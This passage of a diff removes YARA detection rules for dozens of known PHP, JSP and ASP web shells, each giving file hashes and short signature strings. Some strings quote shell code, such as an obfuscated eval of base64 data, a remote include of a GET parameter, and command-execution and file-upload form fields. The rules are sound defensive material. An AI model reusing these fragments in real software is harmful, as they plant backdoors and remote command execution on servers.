-		$s7 = "Unix:/bin/sh -c tar vxf xxx.tar Windows:c:\\winnt\\system32\\cmd.exe /c type c:"
-	condition:
-		all of them
-}
-rule webshell_jsp_action {
-	meta:
-		description = "Web Shell - file action.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "5a7d931094f5570aaf5b7b3b06c3d8c0"
-	strings:
-		$s1 = "String url=\"jdbc:oracle:thin:@localhost:1521:orcl\";" fullword
-		$s6 = "<%@ page contentType=\"text/html;charset=gb2312\"%>" fullword
-	condition:
-		all of them
-}
-rule webshell_Inderxer {
-	meta:
-		description = "Web Shell - file Inderxer.asp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "9ea82afb8c7070817d4cdf686abe0300"
-	strings:
-		$s4 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typ"
-	condition:
-		all of them
-}
-rule webshell_asp_Rader {
-	meta:
-		description = "Web Shell - file Rader.asp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "ad1a362e0a24c4475335e3e891a01731"
-	strings:
-		$s1 = "FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0"
-		$s3 = "m\" target=inf onClick=\"window.open('?action=help','inf','width=450,height=400 "
-	condition:
-		all of them
-}
-rule webshell_c99_madnet_smowu {
-	meta:
-		description = "Web Shell - file smowu.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "3aaa8cad47055ba53190020311b0fb83"
-	strings:
-		$s0 = "//Authentication" fullword
-		$s1 = "$login = \"" fullword
-		$s2 = "eval(gzinflate(base64_decode('"
-		$s4 = "//Pass" 
-		$s5 = "$md5_pass = \"" 
-		$s6 = "//If no pass then hash"
-	condition:
-		all of them
-}
-rule webshell_php_moon {
-	meta:
-		description = "Web Shell - file moon.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "2a2b1b783d3a2fa9a50b1496afa6e356"
-	strings:
-		$s2 = "echo '<option value=\"create function backshell returns string soname"
-		$s3 = "echo      \"<input name='p' type='text' size='27' value='\".dirname(_FILE_).\""
-		$s8 = "echo '<option value=\"select cmdshell(\\'net user "
-	condition:
-		2 of them
-}
-rule webshell_jsp_jdbc {
-	meta:
-		description = "Web Shell - file jdbc.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "23b0e6f91a8f0d93b9c51a2a442119ce"
-	strings:
-		$s4 = "String cs = request.getParameter(\"z0\")==null?\"gbk\": request.getParameter(\"z"
-	condition:
-		all of them
-}
-rule webshell_minupload {
-	meta:
-		description = "Web Shell - file minupload.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "ec905a1395d176c27f388d202375bdf9"
-	strings:
-		$s0 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">   " fullword
-		$s9 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859"
-	condition:
-		all of them
-}
-rule webshell_ELMALISEKER_Backd00r {
-	meta:
-		description = "Web Shell - file ELMALISEKER Backd00r.asp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "3aa403e0a42badb2c23d4a54ef43e2f4"
-	strings:
-		$s0 = "response.write(\"<tr><td bgcolor=#F8F8FF><input type=submit name=cmdtxtFileOptio"
-		$s2 = "if FP = \"RefreshFolder\" or request.form(\"cmdOption\")=\"DeleteFolder\" or req"
-	condition:
-		all of them
-}
-rule webshell_PHP_bug_1_ {
-	meta:
-		description = "Web Shell - file bug (1).php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "91c5fae02ab16d51fc5af9354ac2f015"
-	strings:
-		$s0 = "@include($_GET['bug']);" fullword
-	condition:
-		all of them
-}
-rule webshell_caidao_shell_hkmjj {
-	meta:
-		description = "Web Shell - file hkmjj.asp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "e7b994fe9f878154ca18b7cde91ad2d0"
-	strings:
-		$s6 = "codeds=\"Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li\"  " fullword
-	condition:
-		all of them
-}
-rule webshell_jsp_asd {
-	meta:
-		description = "Web Shell - file asd.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "a042c2ca64176410236fcc97484ec599"
-	strings:
-		$s3 = "<%@ page language=\"java\" pageEncoding=\"gbk\"%>" fullword
-		$s6 = "<input size=\"100\" value=\"<%=application.getRealPath(\"/\") %>\" name=\"url"
-	condition:
-		all of them
-}
-rule webshell_jsp_inback3 {
-	meta:
-		description = "Web Shell - file inback3.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "ea5612492780a26b8aa7e5cedd9b8f4e"
-	strings:
-		$s0 = "<%if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application"
-	condition:
-		all of them
-}
-rule webshell_metaslsoft {
-	meta:
-		description = "Web Shell - file metaslsoft.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "aa328ed1476f4a10c0bcc2dde4461789"
-	strings:
-		$s7 = "$buff .= \"<tr><td><a href=\\\"?d=\".$pwd.\"\\\">[ $folder ]</a></td><td>LINK</t"
-	condition:
-		all of them
-}
-rule webshell_asp_Ajan {
-	meta:
-		description = "Web Shell - file Ajan.asp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "b6f468252407efc2318639da22b08af0"
-	strings:
-		$s3 = "entrika.write \"BinaryStream.SaveToFile \"\"c:\\downloaded.zip\"\", adSaveCreate"
-	condition:
-		all of them
-}
-rule webshell_config_myxx_zend {
-	meta:
-		description = "Web Shell - from files config.jsp, myxx.jsp, zend.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "d44df8b1543b837e57cc8f25a0a68d92"
-		hash1 = "e0354099bee243702eb11df8d0e046df"
-		hash2 = "591ca89a25f06cf01e4345f98a22845c"
-	strings:
-		$s3 = ".println(\"<a href=\\\"javascript:alert('You Are In File Now ! Can Not Pack !');"
-	condition:
-		all of them
-}
-rule webshell_browser_201_3_ma_download {
-	meta:
-		description = "Web Shell - from files browser.jsp, 201.jsp, 3.jsp, ma.jsp, download.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "37603e44ee6dc1c359feb68a0d566f76"
-		hash1 = "a7e25b8ac605753ed0c438db93f6c498"
-		hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"
-		hash3 = "4cc68fa572e88b669bce606c7ace0ae9"
-		hash4 = "fa87bbd7201021c1aefee6fcc5b8e25a"
-	strings:
-		$s2 = "<small>jsp File Browser version <%= VERSION_NR%> by <a"
-		$s3 = "else if (fName.endsWith(\".mpg\") || fName.endsWith(\".mpeg\") || fName.endsWith"
-	condition:
-		all of them
-}
-rule webshell_itsec_itsecteam_shell_jHn {
-	meta:
-		description = "Web Shell - from files itsec.php, itsecteam_shell.php, jHn.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "8ae9d2b50dc382f0571cd7492f079836"
-		hash1 = "bd6d3b2763c705a01cc2b3f105a25fa4"
-		hash2 = "40c6ecf77253e805ace85f119fe1cebb"
-	strings:
-		$s4 = "echo $head.\"<font face='Tahoma' size='2'>Operating System : \".php_uname().\"<b"
-		$s5 = "echo \"<center><form name=client method='POST' action='$_SERVER[PHP_SELF]?do=db'"
-	condition:
-		all of them
-}
-rule webshell_ghost_source_icesword_silic {
-	meta:
-		description = "Web Shell - from files ghost_source.php, icesword.php, silic.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "cbf64a56306c1b5d98898468fc1fdbd8"
-		hash1 = "6e20b41c040efb453d57780025a292ae"
-		hash2 = "437d30c94f8eef92dc2f064de4998695"
-	strings:
-		$s3 = "if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $"
-		$s6 = "if(!empty($_FILES['ufp']['name'])){if($_POST['ufn'] != '') $upfilename = $_POST["
-	condition:
-		all of them
-}
-rule webshell_JspSpy_JspSpyJDK5_JspSpyJDK51_luci_jsp_spy2009_m_ma3_xxx {
-	meta:
-		description = "Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, t00ls.jsp, u.jsp, xia.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
-		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
-		hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
-		hash3 = "76037ebd781ad0eac363d56fc81f4b4f"
-		hash4 = "8b457934da3821ba58b06a113e0d53d9"
-		hash5 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
-		hash6 = "14e9688c86b454ed48171a9d4f48ace8"
-		hash7 = "b330a6c2d49124ef0729539761d6ef0b"
-		hash8 = "d71716df5042880ef84427acee8b121e"
-		hash9 = "341298482cf90febebb8616426080d1d"
-		hash10 = "29aebe333d6332f0ebc2258def94d57e"
-		hash11 = "42654af68e5d4ea217e6ece5389eb302"
-		hash12 = "88fc87e7c58249a398efd5ceae636073"
-		hash13 = "4a812678308475c64132a9b56254edbc"
-		hash14 = "9626eef1a8b9b8d773a3b2af09306a10"
-		hash15 = "344f9073576a066142b2023629539ebd"
-		hash16 = "32dea47d9c13f9000c4c807561341bee"
-		hash17 = "90a5ba0c94199269ba33a58bc6a4ad99"
-		hash18 = "655722eaa6c646437c8ae93daac46ae0"
-		hash19 = "b9744f6876919c46a29ea05b1d95b1c3"
-		hash20 = "9c94637f76e68487fa33f7b0030dd932"
-		hash21 = "6acc82544be056580c3a1caaa4999956"
-		hash22 = "6aa32a6392840e161a018f3907a86968"
-		hash23 = "349ec229e3f8eda0f9eb918c74a8bf4c"
-		hash24 = "3ea688e3439a1f56b16694667938316d"
-		hash25 = "ab77e4d1006259d7cbc15884416ca88c"
-		hash26 = "71097537a91fac6b01f46f66ee2d7749"
-		hash27 = "2434a7a07cb47ce25b41d30bc291cacc"
-		hash28 = "7a4b090619ecce6f7bd838fe5c58554b"
-	strings:
-		$s8 = "\"<form action=\\\"\"+SHELL_NAME+\"?o=upload\\\" method=\\\"POST\\\" enctype="
-		$s9 = "<option value='reg query \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\T"
-	condition:
-		all of them
-}
-rule webshell_2_520_job_ma1_ma4_2 {
-	meta:
-		description = "Web Shell - from files 2.jsp, 520.jsp, job.jsp, ma1.jsp, ma4.jsp, 2.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "64a3bf9142b045b9062b204db39d4d57"
-		hash1 = "9abd397c6498c41967b4dd327cf8b55a"
-		hash2 = "56c005690da2558690c4aa305a31ad37"
-		hash3 = "532b93e02cddfbb548ce5938fe2f5559"
-		hash4 = "6e0fa491d620d4af4b67bae9162844ae"
-		hash5 = "7eabe0f60975c0c73d625b7ddf7b9cbd"
-	strings:
-		$s4 = "_url = \"jdbc:microsoft:sqlserver://\" + dbServer + \":\" + dbPort + \";User=\" "
-		$s9 = "result += \"<meta http-equiv=\\\"refresh\\\" content=\\\"2;url=\" + request.getR"
-	condition:
-		all of them
-}
-rule webshell_000_403_807_a_c5_config_css_dm_he1p_JspSpy_JspSpyJDK5_JspSpyJDK51_luci_jsp_xxx {
-	meta:
-		description = "Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, config.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, myxx.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, t00ls.jsp, u.jsp, xia.jsp, zend.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
-		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
-		hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
-		hash3 = "76037ebd781ad0eac363d56fc81f4b4f"
-		hash4 = "8b457934da3821ba58b06a113e0d53d9"
-		hash5 = "d44df8b1543b837e57cc8f25a0a68d92"
-		hash6 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
-		hash7 = "14e9688c86b454ed48171a9d4f48ace8"
-		hash8 = "b330a6c2d49124ef0729539761d6ef0b"
-		hash9 = "d71716df5042880ef84427acee8b121e"
-		hash10 = "341298482cf90febebb8616426080d1d"
-		hash11 = "29aebe333d6332f0ebc2258def94d57e"
-		hash12 = "42654af68e5d4ea217e6ece5389eb302"
-		hash13 = "88fc87e7c58249a398efd5ceae636073"
-		hash14 = "4a812678308475c64132a9b56254edbc"
-		hash15 = "9626eef1a8b9b8d773a3b2af09306a10"
-		hash16 = "e0354099bee243702eb11df8d0e046df"
-		hash17 = "344f9073576a066142b2023629539ebd"
-		hash18 = "32dea47d9c13f9000c4c807561341bee"
-		hash19 = "90a5ba0c94199269ba33a58bc6a4ad99"
-		hash20 = "655722eaa6c646437c8ae93daac46ae0"
-		hash21 = "b9744f6876919c46a29ea05b1d95b1c3"
-		hash22 = "9c94637f76e68487fa33f7b0030dd932"
-		hash23 = "6acc82544be056580c3a1caaa4999956"
-		hash24 = "6aa32a6392840e161a018f3907a86968"
-		hash25 = "591ca89a25f06cf01e4345f98a22845c"
-		hash26 = "349ec229e3f8eda0f9eb918c74a8bf4c"
-		hash27 = "3ea688e3439a1f56b16694667938316d"
-		hash28 = "ab77e4d1006259d7cbc15884416ca88c"
-		hash29 = "71097537a91fac6b01f46f66ee2d7749"
-		hash30 = "2434a7a07cb47ce25b41d30bc291cacc"
-		hash31 = "7a4b090619ecce6f7bd838fe5c58554b"
-	strings:
-		$s0 = "ports = \"21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500\";" fullword
-		$s1 = "private static class VEditPropertyInvoker extends DefaultInvoker {" fullword
-	condition:
-		all of them
-}
-rule webshell_wso2_5_1_wso2_5_wso2 {
-	meta:
-		description = "Web Shell - from files wso2.5.1.php, wso2.5.php, wso2.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "dbeecd555a2ef80615f0894027ad75dc"
-		hash1 = "7c8e5d31aad28eb1f0a9a53145551e05"
-		hash2 = "cbc44fb78220958f81b739b493024688"
-	strings:
-		$s7 = "$opt_charsets .= '<option value=\"'.$item.'\" '.($_POST['charset']==$item?'selec"
-		$s8 = ".'</td><td><a href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode($f['na"
-	condition:
-		all of them
-}
-rule webshell_000_403_c5_queryDong_spyjsp2010_t00ls {
-	meta:
-		description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, queryDong.jsp, spyjsp2010.jsp, t00ls.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
-		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
-		hash2 = "8b457934da3821ba58b06a113e0d53d9"
-		hash3 = "90a5ba0c94199269ba33a58bc6a4ad99"
-		hash4 = "655722eaa6c646437c8ae93daac46ae0"
-		hash5 = "9c94637f76e68487fa33f7b0030dd932"
-	strings:
-		$s8 = "table.append(\"<td nowrap> <a href=\\\"#\\\" onclick=\\\"view('\"+tbName+\"')"
-		$s9 = "\"<p><input type=\\\"hidden\\\" name=\\\"selectDb\\\" value=\\\"\"+selectDb+\""
-	condition:
-		all of them
-}
-rule webshell_404_data_suiyue {
-	meta:
-		description = "Web Shell - from files 404.jsp, data.jsp, suiyue.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "7066f4469c3ec20f4890535b5f299122"
-		hash1 = "9f54aa7b43797be9bab7d094f238b4ff"
-		hash2 = "c93d5bdf5cf62fe22e299d0f2b865ea7"
-	strings:
-		$s3 = " sbCopy.append(\"<input type=button name=goback value=' \"+strBack[languageNo]+"
-	condition:
-		all of them
-}
-rule webshell_r57shell_r57shell127_SnIpEr_SA_Shell_EgY_SpIdEr_ShElL_V2_r57_xxx {
-	meta:
-		description = "Web Shell - from files r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, r57.php, Backdoor.PHP.Agent.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "ef43fef943e9df90ddb6257950b3538f"
-		hash1 = "ae025c886fbe7f9ed159f49593674832"
-		hash2 = "911195a9b7c010f61b66439d9048f400"
-		hash3 = "697dae78c040150daff7db751fc0c03c"
-		hash4 = "513b7be8bd0595c377283a7c87b44b2e"
-		hash5 = "1d912c55b96e2efe8ca873d6040e3b30"
-		hash6 = "e5b2131dd1db0dbdb43b53c5ce99016a"
-		hash7 = "4108f28a9792b50d95f95b9e5314fa1e"
-		hash8 = "41af6fd253648885c7ad2ed524e0692d"
-		hash9 = "6fcc283470465eed4870bcc3e2d7f14d"
-	strings:
-		$s2 = "echo sr(15,\"<b>\".$lang[$language.'_text58'].$arrow.\"</b>\",in('text','mk_name"
-		$s3 = "echo sr(15,\"<b>\".$lang[$language.'_text21'].$arrow.\"</b>\",in('checkbox','nf1"
-		$s9 = "echo sr(40,\"<b>\".$lang[$language.'_text26'].$arrow.\"</b>\",\"<select size="
-	condition:
-		all of them
-}
-rule webshell_807_a_css_dm_he1p_JspSpy_xxx {
-	meta:
-		description = "Web Shell - from files 807.jsp, a.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, nogfw.jsp, ok.jsp, style.jsp, u.jsp, xia.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
-		hash1 = "76037ebd781ad0eac363d56fc81f4b4f"
-		hash2 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
-		hash3 = "14e9688c86b454ed48171a9d4f48ace8"
-		hash4 = "b330a6c2d49124ef0729539761d6ef0b"
-		hash5 = "d71716df5042880ef84427acee8b121e"
-		hash6 = "341298482cf90febebb8616426080d1d"
-		hash7 = "29aebe333d6332f0ebc2258def94d57e"
-		hash8 = "42654af68e5d4ea217e6ece5389eb302"
-		hash9 = "88fc87e7c58249a398efd5ceae636073"
-		hash10 = "4a812678308475c64132a9b56254edbc"
-		hash11 = "9626eef1a8b9b8d773a3b2af09306a10"
-		hash12 = "344f9073576a066142b2023629539ebd"
-		hash13 = "32dea47d9c13f9000c4c807561341bee"
-		hash14 = "b9744f6876919c46a29ea05b1d95b1c3"
-		hash15 = "6acc82544be056580c3a1caaa4999956"
-		hash16 = "6aa32a6392840e161a018f3907a86968"
-		hash17 = "349ec229e3f8eda0f9eb918c74a8bf4c"
-		hash18 = "3ea688e3439a1f56b16694667938316d"
-		hash19 = "ab77e4d1006259d7cbc15884416ca88c"
-		hash20 = "71097537a91fac6b01f46f66ee2d7749"
-		hash21 = "2434a7a07cb47ce25b41d30bc291cacc"
-		hash22 = "7a4b090619ecce6f7bd838fe5c58554b"
-	strings:
-		$s1 = "\"<h2>Remote Control &raquo;</h2><input class=\\\"bt\\\" onclick=\\\"var"
-		$s2 = "\"<p>Current File (import new file name and new file)<br /><input class=\\\"inpu"
-		$s3 = "\"<p>Current file (fullpath)<br /><input class=\\\"input\\\" name=\\\"file\\\" i"
-	condition:
-		all of them
-}
-rule webshell_201_3_ma_download {
-	meta:
-		description = "Web Shell - from files 201.jsp, 3.jsp, ma.jsp, download.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "a7e25b8ac605753ed0c438db93f6c498"
-		hash1 = "fb8c6c3a69b93e5e7193036fd31a958d"
-		hash2 = "4cc68fa572e88b669bce606c7ace0ae9"
-		hash3 = "fa87bbd7201021c1aefee6fcc5b8e25a"
-	strings:
-		$s0 = "<input title=\"Upload selected file to the current working directory\" type=\"Su"
-		$s5 = "<input title=\"Launch command in current directory\" type=\"Submit\" class=\"but"
-		$s6 = "<input title=\"Delete all selected files and directories incl. subdirs\" class="
-	condition:
-		all of them
-}
-rule webshell_browser_201_3_400_in_JFolder_jfolder01_jsp_leo_ma_warn_webshell_nc_download {
-	meta:
-		description = "Web Shell - from files browser.jsp, 201.jsp, 3.jsp, 400.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, ma.jsp, warn.jsp, webshell-nc.jsp, download.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "37603e44ee6dc1c359feb68a0d566f76"
-		hash1 = "a7e25b8ac605753ed0c438db93f6c498"
-		hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"
-		hash3 = "36331f2c81bad763528d0ae00edf55be"
-		hash4 = "793b3d0a740dbf355df3e6f68b8217a4"
-		hash5 = "8979594423b68489024447474d113894"
-		hash6 = "ec482fc969d182e5440521c913bab9bd"
-		hash7 = "f98d2b33cd777e160d1489afed96de39"
-		hash8 = "4b4c12b3002fad88ca6346a873855209"
-		hash9 = "4cc68fa572e88b669bce606c7ace0ae9"
-		hash10 = "e9a5280f77537e23da2545306f6a19ad"
-		hash11 = "598eef7544935cf2139d1eada4375bb5"
-		hash12 = "fa87bbd7201021c1aefee6fcc5b8e25a"
-	strings:
-		$s4 = "UplInfo info = UploadMonitor.getInfo(fi.clientFileName);" fullword
-		$s5 = "long time = (System.currentTimeMillis() - starttime) / 1000l;" fullword
-	condition:
-		all of them
-}
-rule webshell_shell_phpspy_2006_arabicspy {
-	meta:
-		description = "Web Shell - from files shell.php, phpspy_2006.php, arabicspy.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "791708057d8b429d91357d38edf43cc0"
-		hash1 = "40a1f840111996ff7200d18968e42cfe"
-		hash2 = "e0202adff532b28ef1ba206cf95962f2"
-	strings:
-		$s0 = "elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype"
-		$s8 = "echo \"<form action=\\\"?action=shell&dir=\".urlencode($dir).\"\\\" method=\\\"P"
-	condition:
-		all of them
-}
-rule webshell_in_JFolder_jfolder01_jsp_leo_warn {
-	meta:
-		description = "Web Shell - from files in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "793b3d0a740dbf355df3e6f68b8217a4"
-		hash1 = "8979594423b68489024447474d113894"
-		hash2 = "ec482fc969d182e5440521c913bab9bd"
-		hash3 = "f98d2b33cd777e160d1489afed96de39"
-		hash4 = "4b4c12b3002fad88ca6346a873855209"
-		hash5 = "e9a5280f77537e23da2545306f6a19ad"
-	strings:
-		$s4 = "sbFile.append(\"  &nbsp;<a href=\\\"javascript:doForm('down','\"+formatPath(strD"
-		$s9 = "sbFile.append(\" &nbsp;<a href=\\\"javascript:doForm('edit','\"+formatPath(strDi"
-	condition:
-		all of them
-}
-rule webshell_2_520_icesword_job_ma1_ma4_2 {
-	meta:
-		description = "Web Shell - from files 2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp, ma4.jsp, 2.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "64a3bf9142b045b9062b204db39d4d57"
-		hash1 = "9abd397c6498c41967b4dd327cf8b55a"
-		hash2 = "077f4b1b6d705d223b6d644a4f3eebae"
-		hash3 = "56c005690da2558690c4aa305a31ad37"
-		hash4 = "532b93e02cddfbb548ce5938fe2f5559"
-		hash5 = "6e0fa491d620d4af4b67bae9162844ae"
-		hash6 = "7eabe0f60975c0c73d625b7ddf7b9cbd"
-	strings:
-		$s2 = "private String[] _textFileTypes = {\"txt\", \"htm\", \"html\", \"asp\", \"jsp\","
-		$s3 = "\\\" name=\\\"upFile\\\" size=\\\"8\\\" class=\\\"textbox\\\" />&nbsp;<input typ"
-		$s9 = "if (request.getParameter(\"password\") == null && session.getAttribute(\"passwor"
-	condition:
-		all of them
-}
-rule webshell_phpspy_2005_full_phpspy_2005_lite_PHPSPY {
-	meta:
-		description = "Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, PHPSPY.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "b68bfafc6059fd26732fa07fb6f7f640"
-		hash1 = "42f211cec8032eb0881e87ebdb3d7224"
-		hash2 = "0712e3dc262b4e1f98ed25760b206836"
-	strings:
-		$s6 = "<input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_POST['comma"
-		$s7 = "echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],\"\".$uploaddir.\"/\".$_FILE"
-		$s8 = "<option value=\"passthru\" <? if ($execfunc==\"passthru\") { echo \"selected\"; "
-	condition:
-		2 of them
-}
-rule webshell_shell_phpspy_2006_arabicspy_hkrkoz {
-	meta:
-		description = "Web Shell - from files shell.php, phpspy_2006.php, arabicspy.php, hkrkoz.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "791708057d8b429d91357d38edf43cc0"
-		hash1 = "40a1f840111996ff7200d18968e42cfe"
-		hash2 = "e0202adff532b28ef1ba206cf95962f2"
-		hash3 = "802f5cae46d394b297482fd0c27cb2fc"
-	strings:
-		$s5 = "$prog = isset($_POST['prog']) ? $_POST['prog'] : \"/c net start > \".$pathname."
-	condition:
-		all of them
-}
-rule webshell_c99_Shell_ci_Biz_was_here_c100_v_xxx {
-	meta:
-		description = "Web Shell - from files c99.php, Shell [ci] .Biz was here.php, c100 v. 777shell v. Undetectable #18a Modded by 777 - Don.php, c66.php, c99-shadows-mod.php, c99shell.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
-		hash1 = "f2fa878de03732fbf5c86d656467ff50"
-		hash2 = "27786d1e0b1046a1a7f67ee41c64bf4c"
-		hash3 = "0f5b9238d281bc6ac13406bb24ac2a5b"
-		hash4 = "68c0629d08b1664f5bcce7d7f5f71d22"
-		hash5 = "048ccc01b873b40d57ce25a4c56ea717"
-	strings:
-		$s8 = "else {echo \"Running datapipe... ok! Connect to <b>\".getenv(\"SERVER_ADDR\""
-	condition:
-		all of them
-}
-rule webshell_2008_2009lite_2009mssql {
-	meta:
-		description = "Web Shell - from files 2008.php, 2009lite.php, 2009mssql.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "3e4ba470d4c38765e4b16ed930facf2c"
-		hash1 = "3f4d454d27ecc0013e783ed921eeecde"
-		hash2 = "aa17b71bb93c6789911bd1c9df834ff9"
-	strings:
-		$s0 = "<a href=\"javascript:godir(\\''.$drive->Path.'/\\');"
-		$s7 = "p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all"
-	condition:
-		all of them
-}
-rule webshell_shell_phpspy_2005_full_phpspy_2005_lite_phpspy_2006_arabicspy_PHPSPY_hkrkoz {
-	meta:
-		description = "Web Shell - from files shell.php, phpspy_2005_full.php, phpspy_2005_lite.php, phpspy_2006.php, arabicspy.php, PHPSPY.php, hkrkoz.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "791708057d8b429d91357d38edf43cc0"
-		hash1 = "b68bfafc6059fd26732fa07fb6f7f640"
-		hash2 = "42f211cec8032eb0881e87ebdb3d7224"
-		hash3 = "40a1f840111996ff7200d18968e42cfe"
-		hash4 = "e0202adff532b28ef1ba206cf95962f2"
-		hash5 = "0712e3dc262b4e1f98ed25760b206836"
-		hash6 = "802f5cae46d394b297482fd0c27cb2fc"
-	strings:
-		$s0 = "$mainpath_info           = explode('/', $mainpath);" fullword
-		$s6 = "if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == \"d"
-	condition:
-		all of them
-}
-rule webshell_807_dm_JspSpyJDK5_m_cofigrue {
-	meta:
-		description = "Web Shell - from files 807.jsp, dm.jsp, JspSpyJDK5.jsp, m.jsp, cofigrue.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
